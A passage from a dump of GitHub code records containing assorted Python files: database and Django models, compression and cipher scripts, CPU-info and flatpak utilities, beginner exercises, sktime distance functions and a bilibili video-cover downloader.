primarykey=['LeaseID'])\n\n#--------\ndb.define_table('maintenance_log',\n Field('MaintenanceID','integer'),\n Field('SiteID','integer'),\n Field('EngID','integer'),\n Field('Date','string'),\n Field('Report','string'),\n primarykey=['MaintenanceID'])\n\n#--------\ndb.define_table('maintenance_log_has_device',\n Field('MaintID','integer'),\n Field('DeviceID','string'),\n primarykey=['MaintID', 'DeviceID'])\n\n#--------\ndb.define_table('person',\n Field('PersonID','integer'),\n Field('Name','string'),\n Field('Email','string'),\n Field('PhoneNum','string'),\n Field('Street','string'),\n Field('City','string'),\n Field('Zip','string'),\n Field('Status','string'),\n Field('PassHash','string'),\n Field('Seed','string'),\n primarykey=['PersonID'])\n\n#--------\ndb.define_table('site',\n Field('SiteID','integer'),\n Field('Name','string'),\n Field('Type','string'),\n Field('Latitude','string'),\n Field('Longitude','string'),\n Field('Elevation','string'),\n Field('Callsign','string'),\n Field('Description','string'),\n primarykey=['SiteID'])\n\n#--------\ndb.define_table('site_has_utility',\n Field('Site','integer'),\n Field('Utility','integer'),\n primarykey=['Site', 'Utility'])\n\n#--------\ndb.define_table('utility',\n Field('UtilityID','integer'),\n Field('Type','string'),\n Field('Name','string'),\n Field('Contact','string'),\n Field('Phone','string'),\n Field('Address','string'),\n Field('AccNum','string'),\n primarykey=['UtilityID'])\n\n## after defining tables, uncomment below to enable auditing\nauth.enable_record_versioning(db)\n\nmail.settings.server = settings.email_server\nmail.settings.sender = settings.email_sender\nmail.settings.login = settings.email_login\n","repo_name":"tonymatts/portfolio","sub_path":"mvc/pbs_site_team_project/models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"75054307683","text":"from Compression_Algorithmss.Lempel_Ziv_78 import *\n\nfrom Utilities.Constants import FILE_TO_COMPRESS, LOCATION_TO_SAVE, LOCATION_TO_UNCOMPRESS\n\n\nwith 
open(FILE_TO_COMPRESS, \"rb\") as file:\n    file = file.read()\n\n    compressed_file = compress(file)\n    with open(LOCATION_TO_SAVE, \"wb\") as cf:\n        cf.write(compressed_file)\n\n    with open(LOCATION_TO_SAVE, \"rb\") as ucf:\n        ucf = ucf.read()\n        ucf = uncompress(ucf)\n\n    with open(LOCATION_TO_UNCOMPRESS, \"wb\") as f:\n        f.write(ucf)\n        f.close()\n\n\ndef menu():\n    print(\"1: Compress file\")\n    print(\"2: Uncompress file\")\n    print(\"3: Exit App\")\n\n    selection = input(\"Select an option:\")\n","repo_name":"kyriakos77kolovos/Coding_Theory","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16801762894","text":"#!/usr/bin/env python3\nfrom cpuinfo import get_cpu_info\nfrom cpuid import *\nimport cpuid_native\nimport sys\n\n\ndef get_socket_number_linux(location=\"/sys/devices/system/node/possible\"):\n    if sys.platform != \"linux\":\n        return \"cannot compute socket number for other OS than linux\"\n    with open(location, 'r') as f:\n        data = f.read()\n    return int(data.split('-')[-1])+1\n\n\ndef is_set(id, reg_idx, bit):\n    regs = cpuid(id)\n\n    if (1 << bit) & regs[reg_idx]:\n        return \"Yes\"\n    else:\n        return \"--\"\n\ndef get_cpus():\n    cpu_info = []\n    for i in range(get_socket_number_linux()):\n        cpu_info.append({\n            \"vendor\": cpu_vendor(),\n            \"name\": cpu_name(),\n            \"microarch\": cpu_microarchitecture(),\n            \"vector_instructions\": {\n                \"sse\": is_set(1, 3, 25),\n                \"sse2\": is_set(1, 3, 26),\n                \"sse3\": is_set(1, 2, 0),\n                \"ssse3\": is_set(1, 2, 9),\n                \"sse4.1\": is_set(1, 2, 19),\n                \"sse4.2\": is_set(1, 2, 20),\n                \"sse4a\": is_set(0x80000001, 2, 6),\n                \"avx\": is_set(1, 2, 28),\n                \"avx2\": is_set(7, 1, 5),\n                \"bmi1\": is_set(7, 1, 3),\n                \"bmi2\": is_set(7, 1, 8),\n            },\n            \"cpu_info\": get_cpu_info(),\n        })\n    return cpu_info\n\nif __name__ ==\"__main__\":\n    print(\"socket number linux from a file : {}\".format(get_socket_number_linux()))\n    print(\"Info from the library cpuid-py:\")\n    cpu_info = get_cpus()\n    for toto in [cpu_info[0], get_cpu_info()]:\n        print(\"\\n\\n\\n\")\n        for key,value in toto.items():\n            # recurse one level into nested dicts before printing\n            if isinstance(value, dict):\n                for i,j in value.items():\n                    if isinstance(j, dict):\n                        for a,b in j.items():\n                            print(\"{} : {}\\n\".format(a, b))\n\n                    print(\"{} : {}\\n\".format(i,j))\n\n            else:\n                print(\"{} : {}\\n\".format(key,value))\n","repo_name":"Boavizta/boagent","sub_path":"boagent/hardware/cpu/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"52"} +{"seq_id":"38792459094","text":"\"\"\"\nwhile - a control statement for repeating code\n- The repetition is controlled through a condition expression.\n- The variable used in the condition must change in value for the loop to ever end.\n\nInfinite loop\n- A loop that only completes once suitable input is received\n- The goal is to obtain only values the program can run with\nex) a score. 
0점부터 100점까지의 범위가 있음\n\n유한 반복문\n- 다용도로 사용할 수 있는 반복문\n- 작성한 코드 내에서 규칙적으로 반복되는 내용을 줄이기 위함\n- 규칙성이 없으면 운용할 수 없음\nex) A ~ Z 랭크를 판단하여 출력한다.\n\n\"\"\"\n# 무한 반복문\n# ex) 점수 0점부터 100점까지의 범위가 있음\nnum = -1\nwhile num < 0 or num < 100:\n num = int(input(\"점수 입력 >> \"))\n if num < 0 or num > 100:\n print(\"잘못된 점수입니다.\")\n else:\n print(\"올바른 점수입니다.\")\nprint(\"입력된 점수 : %d점 \"%(num))\n\n\n# 유한 반복문\n# ex)A ~ Z 랭크를 판단하여 출력한다.\n\nnum1 = 100\nnum2 = 98\nrank = 65\n\nwhile rank <= 90:\n if num <= num1 and num >= num2:\n print(\"%c랭크\"%(rank))\n num1-=3\n num2-=3\n rank+=1\n\n\n\n","repo_name":"LeeBG/PythonStudy","sub_path":"day10/08.반복문_복습.py","file_name":"08.반복문_복습.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28454961255","text":"# https://www.codewars.com/kata/5526fc09a1bbd946250002dc/train/python\n\ndef find_outlier(integers):\n odd = []\n even = []\n for number in integers:\n if number % 2 == 0: even.append(number)\n else: odd.append(number)\n if len(odd) > len(even): return(even[0])\n else: return(odd[0])\n \n","repo_name":"THRUWOL/Codewars_solution","sub_path":"Python/Find_The_Parity_Outlier.py","file_name":"Find_The_Parity_Outlier.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"1893035078","text":"import re, mmap, random, string\n\nNOISE = 0.05 # Probability a letter is changed to any other letter during encryption.\n\n# Add any text sanitation code here so that a text is sanitized before we encrypt it and add noise\n# After the first line, text should be a string with no newlines\ndef sanitize(text):\n text = ' '.join(text.split())\n\n return text\n\n ########################################################\n # You probably don't want to edit anything below this. 
#\n    ########################################################\n\n# Uses Regex to pull articles from data\n# Returns list of strings\n# Each element is the body of a news article\ndef get_texts(filename):\n    texts = []\n    with open(filename, 'r+') as f:\n        data = mmap.mmap(f.fileno(),0)\n        bodyRegex = re.compile(\"<BODY>([^<]*)</BODY>\", re.IGNORECASE)\n        matches = bodyRegex.findall(data)\n        for match in matches:\n            text = \"%s\" % match\n            texts.append(text)\n    return texts\n\n# Returns random permutation (as a string) of string.ascii_uppercase\ndef generateKey():\n    key = list(string.ascii_uppercase)\n    random.shuffle(key)\n    return ''.join(key)\n\n# Substitutes character if mapping exists from current to substitution\n# Assumes current and substitution are Capital Strings with no repeating characters\n# Case of return character is same as input character\ndef substitute(character, current, substitution):\n    if character.upper() not in current:\n        return character\n    index_in_substitution = current.find(character.upper())\n    if character.isupper():\n        return substitution[index_in_substitution]\n    return substitution[index_in_substitution].lower()\n\n# Returns text encrypted using substitution cipher with key as the key\ndef encrypt(text, key):\n    result = \"\"\n    for char in text:\n        letter = substitute(char, string.ascii_uppercase, key)\n        result += letter\n    return result\n\n# Returns text with added noise.\n# Each alphabet character has noise chance of getting changed to another random alphabet letter of same case\ndef add_noise(text, noise):\n    result = \"\"\n    for letter in text:\n        if letter in string.ascii_letters and random.random() < noise:\n            random_letter = randomLetter()\n            letter = random_letter.upper() if letter.isupper() else random_letter.lower()\n        result += letter\n    return result\n\n# Returns a random letter. 
Could be upper or lower case\ndef randomLetter():\n return random.choice(string.ascii_letters)\n\ndef main():\n keys = open(\"keys\", 'w')\n output = open(\"substitute\", 'w')\n output_noise = open(\"substitute_noise\", 'w')\n original = open(\"original\", \"w\")\n\n for i in range(22):\n filename = \"reut2-0%02d.sgm\" % i \n texts = get_texts(filename)\n for text in texts:\n text = sanitize(text)\n key = generateKey()\n cipher_text = encrypt(text, key)\n noised = add_noise(cipher_text, NOISE)\n \n keys.write(\"%s\\n\" % key)\n output.write(\"%s\\n\" % cipher_text)\n output_noise.write(\"%s\\n\" % noised)\n original.write(\"%s\\n\" % text)\n\n\nif __name__ == '__main__':\n main()","repo_name":"brendongo/decryptor","sub_path":"generatedata.py","file_name":"generatedata.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10991973436","text":"from django.db import models\nfrom collection.models import Collection\n# Create your models here.\nPAGE_TYPE_CHOICES = [\n\t('about','about'),\n\t('collection','collection'),\n\t('commitments','commitments'),\n\t('conditions','conditions'),\n\t('contact','contact'),\n\t('wishlist','wishlist'),\n\t('login','login'),\n\t('register','register'),\n]\nSECTION_TYPE_CHOICES = [\n\t('image','image'),\n\t('text','text'),\n]\nSECTION_COL_CHOICES = [\n\t('left','left'),\n\t('right','right'),\n]\n\nclass Page(models.Model):\n\tname = models.CharField(max_length = 128, verbose_name = 'Name')\n\tptype = models.CharField(max_length = 128, verbose_name = 'Page Type',choices = PAGE_TYPE_CHOICES)\n\tcover = models.ImageField(upload_to = 'page/',verbose_name = 'Cover')\n\tcollection = models.ForeignKey(Collection, verbose_name = 'Collection', blank = True, null = True,help_text = 'Leave it to blank when the page type is not COLLECTION')\n\n\tclass Meta:\n\t\tverbose_name = 'Page'\n\t\tverbose_name_plural = 'Page'\n\n\tdef __unicode__(self):\n\t\ts = ''\n\t\tif self.ptype == 'collection':\n\t\t\ts = self.name + '--'+ self.collection.name\n\t\telse:\n\t\t\ts = self.name\n\t\treturn s\n\nclass Section(models.Model):\n\tpage = models.ForeignKey(Page, verbose_name = 'Page')\n\tstype = models.CharField(max_length = 128, verbose_name = 'Section Type',choices = SECTION_TYPE_CHOICES)\n\ttitle = models.CharField(max_length = 128, verbose_name = 'Title',blank = True, null = True)\n\tcontent = models.TextField(verbose_name = 'Content',blank = True, null = True)\n\timage = models.ImageField(upload_to = 'section/',blank = True, null = True)\n\tscol = models.CharField(max_length = 128, verbose_name = 'Section Column',choices = SECTION_COL_CHOICES)\n\torder = models.IntegerField(verbose_name = 'Order',help_text = 'Order the section')\n\n\tclass Meta:\n\t\tverbose_name = 'Section'\n\t\tverbose_name_plural = 'Section'\n\t\tordering = ['scol','order']\n\n\tdef __unicode__(self):\n\t\treturn self.scol+str(self.order)\n\n","repo_name":"jazdelu/mbe","sub_path":"page/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15342069195","text":"#!/usr/bin/env python\n# Update the pre-matching locations.csv file for certain sources to find the correct\n# canonical hierarchy based on the Municipality Code that is stored in the Municipality\n# column for that source.\nimport csv\nimport sys\n\nfrom pylib.base.flags import Flags\n\nfrom config.br_covid.datatypes import 
Dimension, DimensionFactoryType\nfrom log import LOG\nfrom util.file.file_config import FileConfig, FilePattern, validate_file_configs\n\nMUNICIPALITY_COLUMN = f'{DimensionFactoryType.clean_prefix}{Dimension.MUNICIPALITY}'\n\n\ndef build_municipality_code_lookup(filename):\n '''Build a mapping from municipality code to the location dict that should be used\n for that code.\n '''\n # NOTE(stephen): BR has two municipality codes that we need to test for.\n short_code_mapping = {}\n long_code_mapping = {}\n with open(filename) as input_file:\n reader = csv.DictReader(input_file)\n for row in reader:\n # NOTE(stephen): Storing the clean-prefixed dimension name since that's what\n # the input source files will use.\n locations = {\n f'{DimensionFactoryType.clean_prefix}{dimension}': row[dimension]\n for dimension in DimensionFactoryType.hierarchical_dimensions\n }\n short_code_mapping[row['MunicipalityCodeShort']] = locations\n long_code_mapping[row['MunicipalityCodeLong']] = locations\n return (short_code_mapping, long_code_mapping)\n\n\ndef process_source(filename, short_code_mapping, long_code_mapping):\n output_rows = []\n header = []\n with open(filename) as input_file:\n reader = csv.DictReader(input_file)\n header = reader.fieldnames\n for row in reader:\n municipality_code = row[MUNICIPALITY_COLUMN]\n location = short_code_mapping.get(\n municipality_code\n ) or long_code_mapping.get(municipality_code)\n # applying treatment rules for unmatched municipalities\n if not location:\n municipality_code = str(municipality_code[:6])\n if municipality_code.startswith(\"53\"):\n municipality_code = \"530010\"\n else:\n municipality_code = municipality_code[:2] + \"0000\"\n location = short_code_mapping.get(municipality_code)\n if not location:\n LOG.warning(\n 'Cannot find location data for municipality code: %s',\n municipality_code,\n )\n location = {}\n output_rows.append({**row, **location})\n\n with open(filename, 'w') as output_file:\n writer = csv.DictWriter(output_file, fieldnames=header)\n writer.writeheader()\n writer.writerows(output_rows)\n\n\ndef main():\n Flags.PARSER.add_argument(\n '--input_basedir_pattern',\n type=str,\n required=True,\n help='Pattern to use to find dimension files for individual sources to '\n 'match.',\n )\n Flags.PARSER.add_argument(\n '--municipality_code_mapping_file',\n type=str,\n required=True,\n help='File with municpality codes mapping to full location hiearchy',\n )\n Flags.PARSER.add_argument(\n '--sources',\n nargs='+',\n type=str,\n required=True,\n help='List of sources to process',\n )\n Flags.InitArgs()\n\n # NOTE(stephen): The original locations.csv file will be overwritten *in place* for\n # the sources provided.\n input_pattern = FilePattern(Flags.ARGS.input_basedir_pattern)\n (short_code_mapping, long_code_mapping) = build_municipality_code_lookup(\n Flags.ARGS.municipality_code_mapping_file\n )\n\n for source in Flags.ARGS.sources:\n LOG.info('Processing %s', source)\n process_source(\n input_pattern.build(source), short_code_mapping, long_code_mapping\n )\n LOG.info('Finished processing sources')\n\n return 0\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"Zenysis/br-training","sub_path":"pipeline/brazil_covid/bin/shared/match_municipality_code.py","file_name":"match_municipality_code.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33997558130","text":"\"\"\"Isolated numba imports for 
_euclidean.\"\"\"\n\n__author__ = [\"chrisholder\", \"TonyBagnall\"]\n\nimport numpy as np\n\nfrom sktime.utils.numba.njit import njit\n\n\n@njit(cache=True, fastmath=True)\ndef _local_euclidean_distance(x, y):\n \"\"\"Compute the local euclidean distance.\n\n Parameters\n ----------\n x: np.ndarray (1d array)\n First time series\n y: np.ndarray (1d array)\n Second time series\n\n Returns\n -------\n float\n Euclidean distance between the two time series\n \"\"\"\n distance = 0.0\n for i in range(x.shape[0]):\n difference = x[i] - y[i]\n distance += difference * difference\n\n return np.sqrt(distance)\n\n\n@njit(cache=True, fastmath=True)\ndef _numba_euclidean_distance(x: np.ndarray, y: np.ndarray) -> float:\n \"\"\"Euclidean distance compiled to no_python.\n\n Parameters\n ----------\n x: np.ndarray (2d array shape (d,m))\n First time series.\n y: np.ndarray (2d array shape (d,m))\n Second time series.\n\n Returns\n -------\n distance: float\n Euclidean distance between x and y.\n \"\"\"\n distance = 0.0\n for i in range(x.shape[0]):\n for j in range(x.shape[1]):\n difference = x[i][j] - y[i][j]\n distance += difference * difference\n return np.sqrt(distance)\n","repo_name":"sktime/sktime","sub_path":"sktime/distances/_euclidean_numba.py","file_name":"_euclidean_numba.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":7028,"dataset":"github-code","pt":"52"} +{"seq_id":"72623569764","text":"import logging\nimport os\n\nfrom flatpaksync.flatpakcmd import flatpakcmd\n\nmylog = logging.getLogger(\"fps\")\n\nclass command():\n\n def __init__(self):\n self.dryrun = False\n\n logging.basicConfig(format='%(levelname)s: %(message)s', level=logging.INFO)\n\n self.conf = os.environ['HOME'] + '/' + \".config/flatpak-sync/flatpak.json\"\n\n\n def setConfig(self, conf):\n if not conf.endswith(\".config/flatpak-sync/flatpak.json\"):\n self.conf = conf\n\n\n def setDebug(self, isVerbose):\n if isVerbose:\n mylog.setLevel(logging.DEBUG)\n mylog.debug(\"Verbose mode enabled\")\n else:\n mylog.setLevel(logging.INFO)\n\n\n def setDryRun(self, isDryrun):\n self.dryrun = isDryrun\n\n\n def checkFlatpak(self):\n fp = flatpakcmd()\n if fp.isInstalled() == False:\n sys.exit(\"Unable to find flatpak! Are you sure flatpak is installed?\")\n \n mylog.debug(\"Flatpak installed: {}\".format(fp.isInstalled()))\n mylog.debug(fp.getVersion())\n mylog.debug(\"Configuration file: {}\".format(self.conf))\n\n\n","repo_name":"jeteokeeffe/flatpak-sync","sub_path":"flatpaksync/commands/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"52"} +{"seq_id":"7043314364","text":"# github.com/bryangoodrich/python-exercises\n# code/0006/0006.py\n\ndef use_state(initial_state):\n state = initial_state\n\n def set_state(new_state):\n nonlocal state\n state[\"value\"] = new_state\n\n return state, set_state\n\ncount, set_count = use_state({\"value\": 0})\nprint(count[\"value\"]) # Output: 0\n\nincrement = lambda: set_count(count[\"value\"] + 1)\ndecrement = lambda: set_count(count[\"value\"] - 1)\n\nincrement() # 1\nincrement() # 2\ndecrement() # 1\n\nprint(count[\"value\"])\n# 1\n","repo_name":"bryangoodrich/python-exercises","sub_path":"code/0006/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"16069528761","text":"#! 
python3\n\"\"\"\nwrite by liucz 2015-10-7\nimitate 'tr' command in Linux Shell\n\"\"\"\n\nimport sys\nimport re\nimport argparse\nfrom handle_stdin import echoLines, storeLines\nfrom handle_string import delete, unique, complement, complementUnique, escaped\n\n\ndef buildParser():\n\tparser = argparse.ArgumentParser()\n\n\tparser.add_argument('-c', '--complement',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'replace all those chars not in src by the single char of rep')\n\tparser.add_argument('-d', '--delete',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'delete all those chars in src')\n\tparser.add_argument('-s', '--squeeze',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'remove redundant continuous repeated chars in src or ' \n\t\t\t\t\t\t\t 'replace continuous repeated chars in src by corresponding char in rep')\n\tparser.add_argument('-t', '--truncate',\n\t\t\t\t\t\taction = 'store_true',\n\t\t\t\t\t\thelp = 'truncate src if len(src) > len(rep) otherwise use last char in rep if len(src) > len(rep)')\n\tparser.add_argument('src',\n\t\t\t\t\t\tnargs = 1,\n\t\t\t\t\t\thelp = 'source char set')\n\tparser.add_argument('rep',\n\t\t\t\t\t\tnargs = '?',\n\t\t\t\t\t\thelp = 'replace char set')\n\t# parser.add_help()\n\treturn parser\n\n\ndef processArgs(args):\n\targs.src = args.src[0]\n\t# print('src = ', args.src)\n\targs.src = escaped(args.src)\n\t# print('src = ', args.src)\n\t\n\t# if args.complement:\n\t# \tif not args.delete and args.rep is None:\n\t# \t\tsys.stderr.write('tr.py: rep must be given when translating\\n')\n\t# \t\treturn False\n\n\tif args.truncate:\n\t\tif args.rep is None:\n\t\t\tsys.stderr.write('tr.py: rep must be given when truncating\\n')\n\t\t\treturn False\n\n\tif args.delete:\n\t\tif args.rep is not None:\n\t\t\tsys.stderr.write('tr.py: rep is ignored when deleting\\n')\n\n\t# check src and rep\n\tif args.rep is not None:\n\t\t# print('rep = ', args.rep)\n\t\targs.rep = escaped(args.rep)\n\t\t# print('rep = ', args.rep)\n\n\t\trepLen = len(args.rep)\n\t\tsrcLen = len(args.src)\n\t\tif srcLen > repLen:\n\t\t\tif args.truncate:\n\t\t\t\targs.src = args.src[:repLen]\n\t\t\telse:\n\t\t\t\targs.rep += args.rep[-1] * (srcLen - repLen)\n\t\telif srcLen < repLen:\n\t\t\targs.rep = args.rep[:srcLen]\n\n\treturn True\n\n\ndef doDelete(targetSet):\n\t# print(\"doDelete\")\n\t# print(targetSet)\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(delete(lines[0], targetSet), end = '')\n\n\ndef doComplementDelete(keepSet):\n\t# print(\"doComplementDelete\")\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(complement(lines[0], keepSet, ''), end = '')\n\n\ndef doSqueeze(src, rep):\n\t# print(\"doSqueeze\")\n\ttransformTable = None\n\tif rep:\n\t\ttransformTable = {src[i]:rep[i] for i in range(len(src))}\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(unique(lines[0], transformTable), end = '')\n\n\ndef doComplementSqueeze(src, rep):\n\t# print(\"doComplementSqueeze\")\n\t# print('rep = %s' % rep)\n\tkeepSet = set(src)\n\tmeetEOF = False\n\twhile not meetEOF:\n\t\tlines, meetEOF = storeLines(1)\n\t\tif lines:\n\t\t\tprint(complementUnique(lines[0], keepSet, None, rep), end = '')\n\n\ndef main():\n\tparser = buildParser()\n\targs = parser.parse_args()\n\t# print(args)\n\tif not processArgs(args):\n\t\treturn\n\n\tif args.delete:\n\t\tif args.complement:\n\t\t\t# delete those not in 
src\n\t\t\tdoComplementDelete(set(args.src))\n\t\telse:\n\t\t\t# delete those in src\n\t\t\tdoDelete(set(args.src))\n\n\telif args.squeeze:\n\t\tif args.complement:\n\t\t\tdoComplementSqueeze(args.src, args.rep)\n\t\telse:\n\t\t\tdoSqueeze(args.src, args.rep)\n\telse:\n\t\techoLines(-1, tillEOF = True)\n\n\n# entry\nif __name__ == '__main__':\n\tmain()","repo_name":"uuuouou/PythonBash","sub_path":"tr.py","file_name":"tr.py","file_ext":"py","file_size_in_byte":3510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"70111505124","text":"'''\nWrite a program that merges two random lists of integers, each with 100 entries, and\nsays which numbers are prime and at which positions they appear.\n'''\n\nimport random\nlista1 = []\nlista2 = []\nlista3 = []\nprimos = []\nqtd = 0\nfor i in range(100):\n    lista1.append(random.randint(1, 1000))\n\nfor i in range(100):\n    lista2.append(random.randint(1, 1000))\n\nlista3 = lista1+lista2\n\ntamanho = len(lista3)\nfor i in range(tamanho):\n    primo = lista3[i] > 1\n    for div in range(2, int(lista3[i] ** 0.5) + 1):\n        if lista3[i] % div == 0:\n            primo = False\n            break\n    if primo:\n        qtd += 1\n        primos.append(lista3[i])\nprint (f'from the list {sorted(lista3)}\\nWe have {qtd} prime number(s)')\nprint (f'{sorted(primos)}')","repo_name":"FllavioAndrade/exercicio-python","sub_path":"ufrn-poo/aula-5/exercicio-6.py","file_name":"exercicio-6.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"22188205272","text":"#%%\nimport conjuntos\nimport textHandler\n#%%\nnConjuntos = 0\nuniverso = {}\nwhile True:\n    print (\"Enter the elements of set \", chr(nConjuntos+65), \": (empty input to finish)\") # better: comma-separated; only ask for the set's name\n    temp = set()\n    valor = input()\n    temp.update(valor.split(','))\n    if(len(valor) == 0):\n        break\n    universo[chr(nConjuntos+65)] = conjuntos.setToList(temp)\n    nConjuntos += 1\noperadoresNom = ['union', 'intersection','cartesian product', 'difference', 'symmetric difference', 'power set']\nprint (\"Symbols\")\nfor i in range(len(operadoresNom)):\n    print(textHandler.operadores[i],\": \",operadoresNom[i])\n\n\n\n\n\n#%%\nprint(universo)\nwhile True:\n    #operadores = ['u', '^', 'x', '-', '+', 'p']\n    print (\"Enter a set operation: \")\n    operacion = input() # u(A,B)\n    if(len(operacion) == 0):\n        break\n    operacion = operacion.replace(\" \", \"\")\n    try:\n        head = textHandler.makeTree(operacion)\n        head.doMath(universo)\n        print(head.valor)\n    except:\n        print(\"Invalid syntax in operation: \",operacion)\n\n# %%\n","repo_name":"JuanGuerreroUP/Conjuntos","sub_path":"conjuntosProyecto.py","file_name":"conjuntosProyecto.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
{"seq_id":"38165215656","text":"# -*- coding: utf-8 -*-\n\nimport json\nfrom functools import reduce\nfrom math import floor\nfrom os import listdir, remove\nfrom os.path import abspath\n\nimport arrow\nimport requests\nfrom pandas import read_excel\n\nWEEKS = floor(\n    (int(arrow.now(\"Asia/Shanghai\").timestamp()) - 1428681600) / 3600 / 24 / 7\n)\n\n\ndef getcover(aid):\n    headers = {\n        \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 
Safari/537.36\",\n }\n params = {\n \"aid\": aid,\n }\n resp = requests.get(\n \"https://api.bilibili.com/x/web-interface/view\", params=params, headers=headers\n )\n result = json.loads(resp.content)\n if result.get(\"code\") == 0:\n origin = result[\"data\"].get(\"title\")\n return {\n aid: {\n \"pic\": result[\"data\"].get(\"pic\"),\n \"pubdate\": arrow.get(\n result[\"data\"].get(\"pubdate\"), tzinfo=\"Asia/Shanghai\"\n ).format(\"YYYY-MM-DD HH:mm\"),\n \"title\": origin,\n \"duration\": result[\"data\"].get(\"duration\"),\n \"owner\": result[\"data\"][\"owner\"].get(\"name\"),\n }\n }\n else:\n print(f\"av{aid} 封面获取失败:{result}\")\n return {\n aid: {\n \"pic\": None,\n \"pubdate\": result.get(\"code\"),\n \"title\": None,\n \"duration\": -1,\n \"owner\": \"\",\n }\n }\n\n\ndef downcover(rank, aid, link):\n try:\n response = requests.get(f\"{link}@640w_400h.jpg\")\n except requests.exceptions.MissingSchema:\n print(f\"requests.exceptions.MissingSchema: av{aid}\\n\")\n return None\n with open(f\"./COVER/{rank}_av{aid}.jpg\", \"wb\") as f:\n f.write(response.content)\n\n\ndef readExcel(filename):\n print(f\"\\n加载文件\\n\\t{abspath(filename)}\")\n df = read_excel(filename)\n print(f\"\\n加载文件\\n\\t{abspath('周刊除外.csv')}\")\n ex_aids = [int(line.strip(\"\\n\")) for line in open(\"周刊除外.csv\", \"r\")]\n for aid in ex_aids:\n exclude = df.loc[df[\"av\"] == aid].index\n df = df.drop(exclude)\n df = df.sort_index().reset_index(drop=True)\n if \"pubdate\" in df.columns:\n pass\n else:\n df.insert(0, \"pubdate\", [0] * len(df.index))\n if \"duration\" in df.columns:\n pass\n else:\n df.insert(0, \"duration\", [0] * len(df.index))\n if \"offset\" in df.columns:\n pass\n else:\n df.insert(0, \"offset\", [0] * len(df.index))\n df = df.astype({\"offset\": \"int\"})\n for x in df.index:\n df.at[x, \"rank\"] = int(x + 1)\n\n print(\"\\n获取视频封面...\")\n covers = reduce(\n lambda x, y: {**x, **y},\n [\n getcover(int(df.at[x, \"av\"]))\n for x in df.index\n if df.at[x, \"av\"] != \"av\" and df.at[x, \"rank\"] <= 150\n ],\n )\n\n for x in df.index:\n if df.at[x, \"rank\"] <= 150:\n df.at[x, \"pubdate\"] = covers[int(df.at[x, \"av\"])][\"pubdate\"]\n df.at[x, \"duration\"] = covers[int(df.at[x, \"av\"])][\"duration\"]\n df.at[x, \"title\"] = (\n covers[int(df.at[x, \"av\"])][\"title\"]\n if covers[int(df.at[x, \"av\"])][\"title\"] is not None\n else df.at[x, \"title\"]\n )\n\n for file in listdir(\"./COVER/\"):\n remove(f\"./COVER/{file}\")\n list(\n map(\n downcover,\n [\n int(df.at[x, \"rank\"])\n for x in df.index\n if df.at[x, \"rank\"] != \"rank\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n [\n int(df.at[x, \"av\"])\n for x in df.index\n if df.at[x, \"av\"] != \"av\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n [\n covers[int(df.at[x, \"av\"])][\"pic\"]\n for x in df.index\n if df.at[x, \"av\"] != \"av\"\n and df.at[x, \"rank\"] <= 100\n and df.at[x, \"rank\"] > 20\n ],\n )\n )\n df.to_excel(f\"{WEEKS:03d}期数据.xlsx\", index=False)\n with open(\"./psdownload/download.txt\", \"w\", encoding=\"utf-8\") as f:\n f.writelines([f\"av{x}\\n\" for x in df[0:20][\"av\"].tolist()])\n with open(f\"./DATA/{WEEKS:03d}期数据.json\", \"w\", encoding=\"utf-8\") as f:\n df[0:100].to_json(f, orient=\"records\", force_ascii=False)\n\n\ndef pickup():\n table = \"fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF\"\n tr = {}\n for i in range(58):\n tr[table[i]] = i\n s = [11, 10, 3, 8, 4, 6]\n xor = 177451812\n add = 8728348608\n\n def 